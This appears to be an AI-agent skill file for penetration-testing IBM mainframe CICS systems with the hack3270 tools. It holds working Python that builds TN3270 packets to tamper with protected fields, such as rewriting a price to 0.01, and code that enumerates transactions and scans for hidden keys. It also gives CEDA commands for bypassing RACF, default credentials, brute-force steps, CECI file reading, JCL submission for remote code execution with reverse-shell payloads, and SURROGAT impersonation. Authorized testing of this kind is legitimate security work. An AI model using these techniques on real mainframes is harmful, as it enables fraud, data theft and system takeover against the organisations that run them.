AgentSkillsCN

tn3270-pentest

Mainframe TN3270/CICS penetration testing via hack3270. Use when interacting with IBM mainframes, 3270 terminal emulators, CICS/KICKS applications, TSO, VTAM, MVS, z/OS and similar systems, or when penetration testing mainframe systems. Covers protocol details, screen parsing, packet construction, hidden field detection, protected field tampering, transaction enumeration, RACF bypass and common attack patterns.

SKILL.md
--- frontmatter
name: tn3270-pentest
description: Mainframe TN3270/CICS penetration testing via hack3270. Use when interacting with IBM mainframes, 3270 terminal emulators, CICS/KICKS applications, TSO, VTAM, MVS, z/OS, or when pen testing mainframe systems. Covers protocol details, screen parsing, packet construction, hidden field detection, protected field tampering, transaction enumeration, RACF bypass, and common attack patterns.

TN3270 Mainframe Penetration Testing

TN3270 Protocol Essentials

Unformatted vs Formatted Screens

Sending a packet whose shape does not match the screen state causes APCT abends, so determine whether the screen is formatted before building the packet. This distinction is critical.

Unformatted (after CLEAR, or blank screen with no fields):

code
AID + cursor_addr(2 bytes) + EBCDIC_data + IAC_EOR

DO NOT include SBA (0x11) on unformatted screens. There are no fields, so SBA corrupts the transaction name and causes APCT abends.

Formatted (has input/protected fields):

code
AID + cursor_addr + [SBA + field_addr + data]... + IAC_EOR

Use analyze_screen_fields() to discover field addresses first.

Key 3270 Orders

| Byte | Order | Purpose |
| --- | --- | --- |
| 0x11 | SBA | Set Buffer Address |
| 0x1D | SF | Start Field (attributes) |
| 0x29 | SFE | Start Field Extended (hidden fields use this) |
| 0x3C | RA | Repeat to Address |
| 0x13 | IC | Insert Cursor |

Screen: 24x80 = 1920 positions. Position = row*80 + col (0-indexed). Addresses are 12-bit encoded into 2 bytes.

AID Keys

| Hex | Key | Hex | Key |
| --- | --- | --- | --- |
| 0x7D | ENTER | 0x6D | CLEAR |
| 0xF1-0xF9, 0x7A-0x7C | PF1-PF12 | 0xC1-0xC9, 0x4A-0x4C | PF13-PF24 |
| 0x6C | PA1 | 0x6E | PA2 |
| 0x6B | PA3 | 0xF0 | SYSREQ |

PF10-PF12 (0x7A-0x7C) and PF22-PF24 (0x4A-0x4C) are not a continuation of the 0xFn / 0xCn runs; a scanner that iterates 0xF1-0xFC or 0xC1-0xCC sends invalid AIDs for those six keys. 0x60 means "no AID".

All text is EBCDIC-encoded on the wire. Use convert_ascii_to_ebcdic().
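The encoding and framing described above, as an added example in Python (not code from the hack3270 project): the 12-bit buffer address codec, EBCDIC conversion through Python's built-in cp037 codec, the AID table with the PF10-12 and PF22-24 exceptions, and builders for the three inbound packet shapes (unformatted, formatted, and the AID-only short read that CLEAR and the PA keys send). Function names mirror the hack3270 tool names for readability but are independent reimplementations. The IAC doubling in `_frame` is a TN3270 framing rule the page does not spell out: a data byte of 0xFF must be sent as 0xFF 0xFF or the peer treats it as a telnet IAC.

```python
"""Minimal TN3270 inbound packet construction (added example, standalone)."""

# Telnet framing used by TN3270: every record ends with IAC EOR, and a data
# byte of 0xFF must be doubled so the peer does not parse it as IAC.
IAC, EOR = 0xFF, 0xEF

# 3270 order used in inbound (client -> host) data
SBA = 0x11

SCREEN_ROWS, SCREEN_COLS = 24, 80
SCREEN_SIZE = SCREEN_ROWS * SCREEN_COLS  # 1920

# AID bytes. PF10-12 and PF22-24 are NOT a continuation of the 0xFn / 0xCn runs.
AID = {"ENTER": 0x7D, "CLEAR": 0x6D, "SYSREQ": 0xF0,
       "PA1": 0x6C, "PA2": 0x6E, "PA3": 0x6B, "NONE": 0x60}
AID.update({f"PF{n}": 0xF0 + n for n in range(1, 10)})          # PF1-9   = 0xF1-0xF9
AID.update({f"PF{n}": 0x7A + n - 10 for n in range(10, 13)})    # PF10-12 = 0x7A-0x7C
AID.update({f"PF{n}": 0xC0 + n - 12 for n in range(13, 22)})    # PF13-21 = 0xC1-0xC9
AID.update({f"PF{n}": 0x4A + n - 22 for n in range(22, 25)})    # PF22-24 = 0x4A-0x4C
SHORT_READ_AIDS = {"CLEAR", "PA1", "PA2", "PA3"}  # these transmit the AID byte alone

# 12-bit buffer addressing: each 6-bit half of the address indexes this 64-entry
# table of "graphic" EBCDIC bytes. The low 6 bits of every entry equal its index,
# which is why decoding is a plain mask.
_ADDR_TABLE = bytes(
    [0x40] + list(range(0xC1, 0xCA)) + list(range(0x4A, 0x50)) + [0x50]
    + list(range(0xD1, 0xDA)) + list(range(0x5A, 0x60)) + [0x60, 0x61]
    + list(range(0xE2, 0xEA)) + list(range(0x6A, 0x70))
    + list(range(0xF0, 0xFA)) + list(range(0x7A, 0x80)))
assert len(_ADDR_TABLE) == 64


def position(row: int, col: int) -> int:
    """0-indexed row/col -> linear buffer position."""
    return row * SCREEN_COLS + col


def encode_buffer_address(pos: int) -> bytes:
    if not 0 <= pos < SCREEN_SIZE:
        raise ValueError(f"position {pos} outside a 24x80 screen")
    return bytes([_ADDR_TABLE[pos >> 6], _ADDR_TABLE[pos & 0x3F]])


def decode_buffer_address(two: bytes) -> int:
    b1, b2 = two[0], two[1]
    if b1 & 0xC0 == 0:                         # 14-bit form: binary, top two bits zero
        return ((b1 & 0x3F) << 8) | b2
    return ((b1 & 0x3F) << 6) | (b2 & 0x3F)    # 12-bit form


def convert_ascii_to_ebcdic(text: str) -> bytes:
    return text.encode("cp037")


def convert_ebcdic_to_ascii(data: bytes) -> str:
    return data.decode("cp037")


def _frame(body: bytes) -> bytes:
    """Escape IAC bytes inside the body and terminate the record with IAC EOR."""
    return body.replace(b"\xff", b"\xff\xff") + bytes([IAC, EOR])


def build_unformatted(aid: str, cursor: int, text: str) -> bytes:
    """AID + cursor + data, no SBA: the only valid shape after CLEAR."""
    return _frame(bytes([AID[aid]]) + encode_buffer_address(cursor)
                  + convert_ascii_to_ebcdic(text))


def build_formatted(aid: str, cursor: int, fields) -> bytes:
    """AID + cursor + (SBA + address + data)... for a screen with fields.
    `fields` is an iterable of (data_position, text); the address is that of
    the first data byte of the field, i.e. attribute position + 1."""
    body = bytes([AID[aid]]) + encode_buffer_address(cursor)
    for pos, text in fields:
        body += bytes([SBA]) + encode_buffer_address(pos) + convert_ascii_to_ebcdic(text)
    return _frame(body)


def build_short_read(aid: str) -> bytes:
    """CLEAR and the PA keys transmit only the AID byte: no cursor, no data."""
    if aid not in SHORT_READ_AIDS:
        raise ValueError(f"{aid} is not a short-read AID")
    return _frame(bytes([AID[aid]]))


if __name__ == "__main__":
    # Typing a transaction code on an unformatted screen (after CLEAR)
    print(build_unformatted("ENTER", position(0, 4), "CEMT").hex(" "))
    # Filling one input field at row 3, col 10 on a formatted screen
    print(build_formatted("ENTER", position(3, 15), [(position(3, 10), "10.00")]).hex(" "))
    # PA3: AID byte only
    print(build_short_read("PA3").hex(" "))
```

`build_unformatted("ENTER", 4, "CEMT")` yields `7d 40 c4 c3 c5 d4 e3 ff ef`: AID, the two address bytes for position 4, the four EBCDIC letters, IAC EOR. Feed the hex to send_raw_hex() and compare against what the emulator sends in a captured session before trusting a hand-built packet.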

Mainframe Access Layers

Layer 1: VTAM / Network

Before reaching CICS, you traverse VTAM (Virtual Telecommunications Access Method).

  • APPLID enumeration: Discover CICS region names via LOGON APPLID(name). Common APPLIDs: CICS, CICSPROD, CICSTS51, DBDCCICS. Use NMAP vtam-enum or brute-force with send_command("LOGON APPLID(name)").
  • USSTAB screens: Custom logon screens defined by USS tables. May display banner info, version numbers, or region names.
  • Multiple CICS regions: Production systems often have multiple CICS regions (dev/test/prod). Always enumerate all APPLIDs.

Layer 2: TSO / ISPF

For MVS/z/OS systems, you may first land at TSO:

  1. At TSO Logon prompt: LOGON userid or type userid into field
  2. Enter password at password prompt
  3. After login: CICS may auto-start, or issue CLEAR + transaction code

Layer 3: CICS Application

Standard CICS entry: CLEAR then type 4-character transaction code (no SBA).

CICS System Transactions (High-Value Targets)

These IBM-supplied transactions ship with CICS and are installed in most regions. Access to ANY of these is a significant finding.

| Transaction | Purpose | Attack Value |
| --- | --- | --- |
| CESN | Sign-on (authentication) | Default creds, brute force |
| CESF | Sign-off | Session termination |
| CEMT | Master terminal (admin) | System enumeration, config changes |
| CEDA | Resource definition | Define new transactions, RACF bypass |
| CECI | Command interpreter | Execute arbitrary EXEC CICS commands |
| CEDF | Execution debugger | Step through programs, inspect data |
| CEBR | Queue browser | Read temporary storage queues |
| CSGM | Good morning (splash) | Version info disclosure |

CEMT Exploitation

If CEMT is accessible, use it for reconnaissance:

  • CEMT I TASK -- list active tasks and userids
  • CEMT I TRAN(*) -- enumerate ALL defined transactions
  • CEMT I FILE(*) -- list all defined files (VSAM datasets) with their open/enabled state
  • CEMT I PROG(*) -- list all installed programs
  • CEMT I TERM(*) -- list terminals with session info
  • CEMT I SYSTEM -- CICS version, region info
  • CEMT SET TRAN(xxxx) ENA -- enable a disabled transaction
  • CEMT SET FILE(xxxx) OPE REA -- open a file for reading

CEDA RACF Bypass

If CEDA is accessible but CEMT/CECI are RACF-protected, use CEDA to copy the restricted transaction definitions under new names. The copies run the same programs as the originals (DFHEMTP for CEMT, DFHECIP for CECI) but are attached under a transaction ID that may have no profile in the transaction security classes (TCICSTRN/GCICSTRN). Note that DFHLIST is a group list, not a group: CEMT is defined in the IBM group DFHOPER and CECI in DFHINTER, and the target group (PENGRP below is an arbitrary example name) must exist or be created by the COPY:

code
CEDA COPY TRANSACTION(CEMT) GROUP(DFHOPER) AS(XEMT) TO(PENGRP)
CEDA COPY TRANSACTION(CECI) GROUP(DFHINTER) AS(XECI) TO(PENGRP)
CEDA INSTALL TRANSACTION(XEMT) GROUP(PENGRP)
CEDA INSTALL TRANSACTION(XECI) GROUP(PENGRP)

Confirm where the originals live with CEDA EXPAND LIST(DFHLIST) before copying. The copies (XEMT, XECI) may not be covered by any RACF profile and are then freely accessible; the bypass fails if the transaction class is protected by a generic or catch-all profile that also matches the new names.

CECI Command Execution

CECI is the most dangerous transaction -- it executes arbitrary EXEC CICS commands:

  • CECI READ FILE(filename) RIDFLD(key) -- read VSAM file records
  • CECI WRITEQ TS QUEUE(name) FROM(data) -- write to temp storage
  • CECI LINK PROGRAM(progname) -- call any installed program
  • CECI SPOOLOPEN -- access JES spool for JCL submission
  • CECI SEND TEXT FROM('data') -- send data to terminal

CEBR Queue Reading

Browse temporary storage queues for sensitive data:

  • CEBR queuename -- read queue contents
  • Queues may contain: session tokens, debugging data, application state, credentials

Attack Patterns

1. Hidden Fields (Every Screen)

CICS applications hide fields using SFE with non-display attribute. Always run analyze_hidden() on every screen.

Common findings:

  • Hidden menu options with real functionality
  • Status flags controlling business logic (e.g., "Purchaseable: Y/N")
  • Internal IDs, debug data, authorization tokens

Hiding is not access control. If the server doesn't validate separately, hidden values can be submitted by anyone.

2. Protected Field Tampering (Critical)

The terminal emulator enforces field protection client-side only: it refuses keyboard input into protected fields and leaves them out of the inbound stream, but send_raw_hex() builds that stream directly. On the host side, BMS RECEIVE MAP maps inbound data to the symbolic map by buffer address, not by field attribute, so a protected field that arrives in the stream is stored into the COBOL map like any other.

Attack: Modify prices, quantities, account numbers, or status codes in protected fields:

code
AID + cursor_addr
+ SBA + protected_field_addr + tampered_EBCDIC_data
+ SBA + input_field_addr + legitimate_data
+ IAC_EOR

Use analyze_screen_fields() to find protected fields with financial data, then encode_buffer_address() and convert_ascii_to_ebcdic() to build the raw packet.
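The field analysis in pattern 1 (hidden fields) and the raw packet in pattern 2 (protected field tampering), as one added example in Python that is not part of hack3270: a parser for the outbound write stream that walks SBA/SF/SFE/RA/IC orders into a 24x80 buffer, classifies every field as protected, numeric, hidden (display bits 11, the non-display attribute the page says CICS sets via SFE) or input, and then resubmits a protected price field alongside the legitimate quantity field. The order-entry screen is constructed for the demo; field names, prices and the regex for "looks like money" are assumptions for illustration, and only the basic attribute (type 0xC0) of an SFE is interpreted.

```python
"""Parse an outbound 3270 write stream into fields, then build a tampered
inbound packet that writes into a protected field (added example, standalone)."""
import re

SCREEN = 1920
# Orders that appear in outbound (host -> terminal) data
SBA, SF, SFE, SA, RA, EUA, IC, PT = 0x11, 0x1D, 0x29, 0x28, 0x3C, 0x12, 0x13, 0x05
# Field attribute bits, after masking off the two graphic-converter bits
PROT, NUM, DISPLAY_MASK, MDT = 0x20, 0x10, 0x0C, 0x01
NONDISPLAY = 0x0C                      # display bits 11: non-display, non-detectable
# 12-bit buffer address table (the low 6 bits of each entry equal its index)
_ADDR_TABLE = bytes(
    [0x40] + list(range(0xC1, 0xCA)) + list(range(0x4A, 0x50)) + [0x50]
    + list(range(0xD1, 0xDA)) + list(range(0x5A, 0x60)) + [0x60, 0x61]
    + list(range(0xE2, 0xEA)) + list(range(0x6A, 0x70))
    + list(range(0xF0, 0xFA)) + list(range(0x7A, 0x80)))


def enc(pos: int) -> bytes:
    return bytes([_ADDR_TABLE[pos >> 6], _ADDR_TABLE[pos & 0x3F]])


def dec(b: bytes) -> int:
    return ((b[0] & 0x3F) << 6) | (b[1] & 0x3F)


def e(text: str) -> bytes:
    return text.encode("cp037")


def parse_write_stream(stream: bytes):
    """Walk the orders, fill a 24x80 buffer, return (fields, cursor)."""
    buf = bytearray(b"\x40" * SCREEN)                 # EBCDIC spaces
    attrs, cursor, addr, i = {}, None, 0, 2           # i=2 skips command byte + WCC

    def put(byte):
        nonlocal addr
        buf[addr] = byte
        addr = (addr + 1) % SCREEN

    while i < len(stream):
        o = stream[i]
        if o == SBA:
            addr = dec(stream[i + 1:i + 3]); i += 3
        elif o == SF:
            attrs[addr] = stream[i + 1] & 0x3F; put(0x40); i += 2
        elif o == SFE:
            n = stream[i + 1]
            pairs = stream[i + 2:i + 2 + 2 * n]
            basic = 0                                  # no 0xC0 pair: default attribute
            for typ, val in zip(pairs[0::2], pairs[1::2]):
                if typ == 0xC0:
                    basic = val & 0x3F
            attrs[addr] = basic; put(0x40); i += 2 + 2 * n
        elif o == RA:                                  # repeat char up to (not incl.) target
            target, ch = dec(stream[i + 1:i + 3]), stream[i + 3]
            put(ch)
            while addr != target:
                put(ch)
            i += 4
        elif o == IC:
            cursor = addr; i += 1
        elif o in (SA, EUA):
            i += 3
        elif o == PT:
            i += 1
        else:
            put(o); i += 1

    fields, starts = [], sorted(attrs)
    for k, start in enumerate(starts):
        end = starts[k + 1] if k + 1 < len(starts) else starts[0] + SCREEN  # last field wraps
        a = attrs[start]
        fields.append({
            "attr_addr": start, "data_addr": (start + 1) % SCREEN,
            "protected": bool(a & PROT), "numeric": bool(a & NUM),
            "hidden": (a & DISPLAY_MASK) == NONDISPLAY, "mdt": bool(a & MDT),
            "content": (buf + buf)[start + 1:end].decode("cp037").rstrip(),
        })
    return fields, cursor


def hidden_fields(fields):
    return [f for f in fields if f["hidden"]]


def input_fields(fields):
    return [f for f in fields if not f["protected"]]


_MONEY = re.compile(r"^\d+\.\d{2}$")      # assumption: what a price looks like on this app


def protected_money_fields(fields):
    return [f for f in fields if f["protected"] and _MONEY.match(f["content"])]


def build_tamper_packet(cursor: int, data: dict, aid: int = 0x7D) -> bytes:
    """Inbound packet carrying data for any address, protected or not. The
    emulator would never send the protected entries; the host does not check."""
    body = bytes([aid]) + enc(cursor)
    for pos, text in sorted(data.items()):
        body += bytes([SBA]) + enc(pos) + e(text)
    return body.replace(b"\xff", b"\xff\xff") + b"\xff\xef"   # IAC doubling + IAC EOR


def _sf(attr6: int) -> bytes:
    return bytes([SF, _ADDR_TABLE[attr6]])


# Constructed order-entry screen: Erase/Write + WCC, then the fields
SAMPLE_SCREEN = (
    bytes([0xF5, 0xC3])
    + bytes([SBA]) + enc(0) + _sf(PROT | NUM) + e("ORDER ENTRY")          # autoskip title
    + bytes([SBA]) + enc(160) + _sf(PROT) + e("PRICE:")
    + bytes([SBA]) + enc(169) + _sf(PROT) + e("12.50")                    # protected price
    + bytes([SBA]) + enc(240) + _sf(PROT) + e("QTY:")
    + bytes([SBA]) + enc(249) + _sf(NUM) + bytes([IC]) + e("1")           # the only input field
    + bytes([SBA]) + enc(320) + bytes([SFE, 1, 0xC0, _ADDR_TABLE[PROT | NONDISPLAY]])
    + e("PURCHASEABLE=Y")                                                  # hidden via SFE
    + bytes([SBA]) + enc(400) + _sf(PROT | NUM) + e("PF3=QUIT")
)


def tamper_demo() -> bytes:
    """Locate the protected price and the quantity input, resubmit both."""
    fields, cursor = parse_write_stream(SAMPLE_SCREEN)
    price, qty = protected_money_fields(fields)[0], input_fields(fields)[0]
    return build_tamper_packet(cursor, {price["data_addr"]: "0.01", qty["data_addr"]: "5"})
```

On the sample screen `analyze`-style output shows one input field at 250, one hidden field at 321 carrying "PURCHASEABLE=Y", and a protected "12.50" at 170; `tamper_demo()` produces `7d c37a 11 c26a f04bf0f1 11 c37a f5 ffef`, an ENTER with the price rewritten to 0.01 and quantity 5. Whether the host accepts it is the finding: if the confirmation screen shows the tampered price, the server trusts the map contents it sent out.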

3. Transaction Enumeration

Discover all defined transactions, not just what menus show:

  • CEMT: CEMT I TRAN(*) lists all transactions if accessible
  • Pattern guessing: Applications use prefixes (e.g., MC** for "Mels Cargo", AP** for "Accounts Payable")
  • Wordlists: Use fuzz_transaction_codes() with cics-default-transactions.txt
  • Config files: CICS PCT (Program Control Table) or CSD defines all transactions. KICKS uses KIKPCT.
  • Direct access: Transactions can be invoked directly via CLEAR + code, bypassing menu-level access controls
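The enumeration loop, as an added example in Python that is not part of hack3270: pattern-based candidate generation from an application prefix, and triage of the screen that comes back from each CLEAR + code + ENTER. Triage keys on the DFHAC message number rather than its wording, because "unrecognized" (DFHAC2001), "not authorized" (DFHAC2033), "disabled" (DFHAC2008), "program not available" (DFHAC2016) and "abended" (DFHAC2002/2006) are all different findings: every one except DFHAC2001 proves the transaction is defined. The `send` callable is the seam where the real session goes (send_clear(), send_command(code), get_screen()); `fake_send` and its screens are constructed stand-ins whose message text is an approximation of IBM's, and the abend severities come from the page's abend table.

```python
"""Transaction code enumeration and response triage (added example, standalone)."""
import itertools
import re
import string

CODE_CHARS = string.ascii_uppercase + string.digits   # 36^2 = 1296 tails for a 2-char prefix

# Message numbers that say "defined, but ..." ; DFHAC2001 is the only "not defined".
_RULES = [
    (re.compile(r"\bDFHAC2001\b"), "undefined"),
    (re.compile(r"\bDFHAC2033\b"), "exists-unauthorized"),   # ESM rejected the attach
    (re.compile(r"\bDFHAC2008\b"), "exists-disabled"),
    (re.compile(r"\bDFHAC2016\b"), "exists-no-program"),     # APCT territory
]
_ABEND = re.compile(r"\bDFHAC200[26]\b.*?\babend\s+([A-Z0-9]{4})", re.I | re.S)

# Severity per the page's abend table
ABEND_SEVERITY = {"ASRA": "critical", "AICA": "critical", "AKCS": "critical", "ASRB": "critical",
                  "APCT": "low", "AEIP": "low", "AEY7": "info"}


def classify(screen: str) -> str:
    """Map a post-ENTER screen to an outcome class."""
    m = _ABEND.search(screen)
    if m:
        code = m.group(1).upper()
        return f"exists-abend:{code}:{ABEND_SEVERITY.get(code, 'unknown')}"
    for rx, label in _RULES:
        if rx.search(screen):
            return label
    return "exists-responded"          # no DFHAC message: the application answered


def candidates_from_prefix(prefix: str, length: int = 4):
    """All codes of the given length starting with prefix, e.g. MCAA..MC99."""
    for tail in itertools.product(CODE_CHARS, repeat=length - len(prefix)):
        yield prefix + "".join(tail)


def enumerate_transactions(send, codes):
    """send(code) -> screen text after CLEAR + code + ENTER.
    Returns only codes the region has defined, with their outcome class."""
    found = {}
    for code in codes:
        outcome = classify(send(code))
        if outcome != "undefined":
            found[code] = outcome
    return found


# ---- constructed fake region so the demo runs offline ---------------------
_FAKE_SCREENS = {
    "MC01": "MELS CARGO  ORDER ENTRY\nCUSTOMER:\nPF3=QUIT",
    "MC03": "DFHAC2002 12:00:00 CICSPROD Transaction MC03 has failed with abend ASRA. "
            "Resource backout was successful.",
    "CEMT": "DFHAC2033 12:00:00 CICSPROD You are not authorized to use transaction CEMT. "
            "Check that the transaction name is correct.",
    "CECI": "DFHAC2008 12:00:00 CICSPROD Transaction CECI has been disabled and cannot be used.",
}


def fake_send(code: str) -> str:
    return _FAKE_SCREENS.get(
        code, f"DFHAC2001 12:00:00 CICSPROD Transaction {code} is unrecognized. "
              "Check that the transaction name is correct.")


if __name__ == "__main__":
    for code, outcome in enumerate_transactions(fake_send, ["MC01", "MC02", "MC03",
                                                            "CEMT", "CECI", "ZZZZ"]).items():
        print(code, outcome)
```

Run the prefix generator against the real session by passing a closure over the hack3270 calls as `send`; an "exists-unauthorized" hit on a guessed application code is worth as much as a responding one, since it names a transaction the security administrator thought nobody knew about.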

4. Default Credentials & Users

| Default | Notes |
| --- | --- |
| CICSUSER / CICSUSER | Common default CICS region userid (the DFLTUSER default) |
| No external security | Some regions run WITHOUT RACF/ACF2/TopSecret -- every user has region-level access |
| Preset terminal security | Terminals may be pre-signed-on as a default user |
| CESN with blank password | Some configurations allow sign-on without password |

Always check: CEMT I SYSTEM for security manager status. If CICS reports no external security, all users have full region ID authority.

5. Brute Force

Use setup_injection() + brute_force_field():

  • PINs/supervisor codes: numeric-4.txt (10K entries), pin-common.txt
  • Passwords: default-passwords.txt
  • Userids: common-userids.txt
  • Set fail_pattern to the error message text

6. AID Key Scanning (Including PA Keys!)

AID keys are handled by COBOL programs, not CICS. Any AID key can trigger hidden functions. Use scan_aid_keys() on every major screen, but also manually test PA1, PA2, and PA3 -- these are often missed by automated scanners.

Critical: Do NOT skip PA keys. In real-world testing, PA3 on a main menu was found to silently navigate to a hidden/secret transaction, and PA1 on that secret screen revealed a nested easter egg. PA keys are dangerous because:

  • They only transmit the AID byte (no field data), making them invisible to field-level monitoring
  • Most users never press PA keys, so developers use them as "hidden" shortcuts
  • COBOL programs handle them via WHEN DFHPA1 / WHEN DFHPA2 / WHEN DFHPA3 in EVALUATE EIBAID
  • They may serve as backdoors to admin screens, debug modes, or privileged functions

Watch for:

  • PA keys (PA1-PA3): Hidden navigation, backdoor access, easter eggs, debug screens
  • Undocumented admin screens on unusual PF keys (PF13-24)
  • Deceptive key labels (PF3 labeled "Quit" but does something else)
  • CLEAR key intercepted by COBOL (doesn't exit, just redisplays -- could also navigate)
  • SYSREQ key behavior
  • Nested hidden AIDs: After discovering a hidden screen, scan ALL keys on THAT screen too

Testing approach: The scan_aid_keys() tool may fail to properly test keys after PF3 (Quit) exits the application, since subsequent keys are sent to a blank CICS screen instead. Manually test keys on each screen to ensure accuracy, or exclude PF3 from automated scans and test it separately.
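The scanning approach described above, as an added example in Python that is not part of hack3270: a scanner that re-establishes the target screen from scratch (CLEAR, entry transaction, replayed key path) after every key, so a PF3 that exits does not leave the remaining keys hitting a blank CICS screen, and that queues every newly discovered screen for its own scan, which is how the nested PA3 then PA1 chain the page describes gets found. `FakeTerminal` is a constructed stand-in whose method names mirror hack3270 tool names (send_clear, send_command, send_aid_key, get_screen) but is not the hack3270 API; its menu transitions, the "MENU" entry transaction and the screen titles are invented for the demo. `naive_scan` is included only to show the failure mode.

```python
"""AID key scanner with re-navigation and nested-screen discovery
(added example, standalone)."""

# PF keys first, then ENTER, PA keys and CLEAR: the order does not matter for the
# real scanner, but it makes the naive scanner's failure after PF3 visible.
ALL_AIDS = [f"PF{n}" for n in range(1, 25)] + ["ENTER", "PA1", "PA2", "PA3", "CLEAR"]


class FakeTerminal:
    """Constructed stand-in for a hack3270 session: a tiny CICS app whose main
    menu has a PA3 backdoor and whose hidden screen has a further PA1 screen."""
    _TRANSITIONS = {
        "MAIN MENU":       {"PF3": "", "PA3": "ADMIN FUNCTIONS"},
        "ADMIN FUNCTIONS": {"PF3": "MAIN MENU", "PA1": "DEBUG MODE"},
        "DEBUG MODE":      {"PF3": "ADMIN FUNCTIONS"},
    }

    def __init__(self):
        self.screen = ""            # blank CICS screen
        self.keys_sent = 0

    def send_clear(self):
        self.screen = ""

    def send_command(self, tran):
        self.screen = "MAIN MENU" if tran == "MENU" else \
            f"DFHAC2001 Transaction {tran} is unrecognized."

    def send_aid_key(self, key):
        self.keys_sent += 1
        if key == "CLEAR":          # CLEAR reaches CICS itself in this app
            self.screen = ""
        else:                       # unknown keys redisplay the same screen
            self.screen = self._TRANSITIONS.get(self.screen, {}).get(key, self.screen)

    def get_screen(self):
        return self.screen


def reach(term, entry_tran, path):
    """Re-establish a screen from scratch: CLEAR, entry transaction, replay keys."""
    term.send_clear()
    term.send_command(entry_tran)
    for key in path:
        term.send_aid_key(key)
    return term.get_screen()


def scan_screen(term, entry_tran, path, keys=ALL_AIDS):
    """Send every AID on the screen reached by `path`; go back after each one."""
    baseline = reach(term, entry_tran, path)
    results = {}
    for key in keys:
        term.send_aid_key(key)
        after = term.get_screen()
        if after == baseline:
            results[key] = ("unchanged", after)
        elif after.strip() == "":
            results[key] = ("exited", after)
        else:
            results[key] = ("navigated", after)
        if reach(term, entry_tran, path) != baseline:   # never test the next key blind
            raise RuntimeError(f"could not re-establish screen after {key}")
    return results


def scan_recursive(term, entry_tran, keys=ALL_AIDS, max_depth=3):
    """Breadth-first over discovered screens: returns {key_path: {key: outcome}}."""
    report, seen, queue = {}, set(), [()]
    while queue:
        path = queue.pop(0)
        screen = reach(term, entry_tran, path)
        if screen in seen or len(path) > max_depth:
            continue
        seen.add(screen)
        results = scan_screen(term, entry_tran, path, keys)
        report[path] = results
        for key, (kind, _) in results.items():
            if kind == "navigated":
                queue.append(path + (key,))
    return report


def naive_scan(term, entry_tran, keys=ALL_AIDS):
    """The failure mode: no re-navigation, so every key after PF3 is sent to a blank screen."""
    reach(term, entry_tran, ())
    out = {}
    for key in keys:
        term.send_aid_key(key)
        out[key] = term.get_screen()
    return out


if __name__ == "__main__":
    for path, results in scan_recursive(FakeTerminal(), "MENU").items():
        hits = {k: v for k, v in results.items() if v[0] != "unchanged"}
        print(path or "(root)", hits)
```

On the fake app the naive loop reports PA3 as a blank screen because PF3 already exited; the re-navigating scanner reports PA3 as "navigated: ADMIN FUNCTIONS" on the root and PA1 as "navigated: DEBUG MODE" one level down. Against a real region, replace `reach` with the hack3270 calls and keep the baseline comparison on screen text minus timestamps, or every key will look like a change.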

7. File Access via CECI

If CECI is available, read application files:

  • CECI STARTBR FILE(name) RIDFLD(key) -- start browsing at key; a key lower than any record (GTEQ is the default) positions at the start of the file
  • CECI READNEXT FILE(name) -- read records sequentially
  • Files may contain: customer data, credentials, configuration, audit logs

Use CEMT I FILE(*) first to enumerate available files.

8. JCL Submission (Remote Code Execution)

If spool access is available via CECI, submit JCL for system-level access:

  • SPOOLOPEN/SPOOLWRITE/SPOOLCLOSE: SPOOLOPEN OUTPUT with USERID('INTRDR') NODE('*') routes the spool file to the JES internal reader, SPOOLWRITE supplies the JCL lines, and SPOOLCLOSE submits the job
  • TDQueue: Write JCL to a transient data queue routed to the internal reader (CXRA) for execution
  • Payloads: reverse shells (TSO/REXX/Unix), FTP commands, custom JCL

This escalates from CICS application access to z/OS system access.

9. SURROGAT / User Impersonation

The SURROGAT resource class controls whether one userid may submit jobs that run under another (profile otheruser.SUBMIT). A job submitted from CICS through the internal reader carries the CICS region's identity as submitter unless the JOB card says otherwise, so check:

  • Submit JCL via CECI SPOOLOPEN/SPOOLWRITE whose JOB card carries USER= for a different, more privileged userid
  • If SURROGAT checks are not enforced for the region userid (or the class is inactive), the job runs as that user and you have impersonated them

10. Information Disclosure

Look for leaked information on every screen:

  • CICS version numbers (CSGM splash screen, CEMT I SYSTEM)
  • z/OS version, LPAR name, SYSPLEX info
  • Userid display in headers/footers
  • File HLQ (High-Level Qualifier) paths revealing dataset naming conventions
  • Library paths exposing CICS installation directories

Abend Codes

| Code | Meaning | Severity |
| --- | --- | --- |
| APCT | Program not found/disabled | Low |
| ASRA | Program check (crash) | Critical |
| AICA | Runaway task | Critical |
| AEY7 | Not authorized (NOTAUTH: resource or command security rejected the request; confirms the resource exists and an ESM is active) | Info |
| S0C7 (often written SOC7) | Data exception (bad packed decimal), surfaced inside an ASRA | Critical |
| S0C4 (often written SOC4) | Protection exception (invalid memory access), surfaced inside an ASRA | Critical |
| ASRB | Operating system abend | Critical |
| AEIP | Invalid EXEC CICS command (INVREQ) | Low |
| AKCS | Storage violation | Critical |

Any ASRA, S0C7, S0C4, or AKCS during testing means input reached code that did not validate it and crashed rather than returning a handled error -- a critical finding.

Pen Test Methodology

  1. Enumerate VTAM APPLIDs -- discover all CICS regions
  2. Check system transactions -- try CESN, CEMT, CEDA, CECI, CEDF, CEBR
  3. Check security manager -- is RACF/ACF2/TopSecret active? (CEMT I SYSTEM)
  4. Enumerate transactions -- CEMT I TRAN(*) or fuzz_transaction_codes()
  5. Navigate all screens -- record every transaction code (top-left of screen)
  6. Check hidden fields -- analyze_hidden() on every screen
  7. Test protected field tampering -- prices, quantities, status codes via send_raw_hex()
  8. Test hidden options -- enter discovered hidden values into input fields
  9. Direct transaction access -- bypass menus by invoking transaction codes directly
  10. Brute force PINs/codes -- setup_injection() + brute_force_field()
  11. Scan AID keys -- scan_aid_keys() on each major screen, plus manual PA1/PA2/PA3 and CLEAR tests on every screen (scan tools may miss these)
  12. Fuzz inputs -- fuzz_all_input_fields() for crashes/abends
  13. Check authorization -- do destructive actions require auth/confirmation?
  14. Attempt file access -- CECI READ FILE() if available
  15. Check JCL submission -- spool/TDQueue access for RCE
  16. Examine traffic -- load session DB, compare packets, look for anomalies

hack3270 MCP Tools Quick Reference

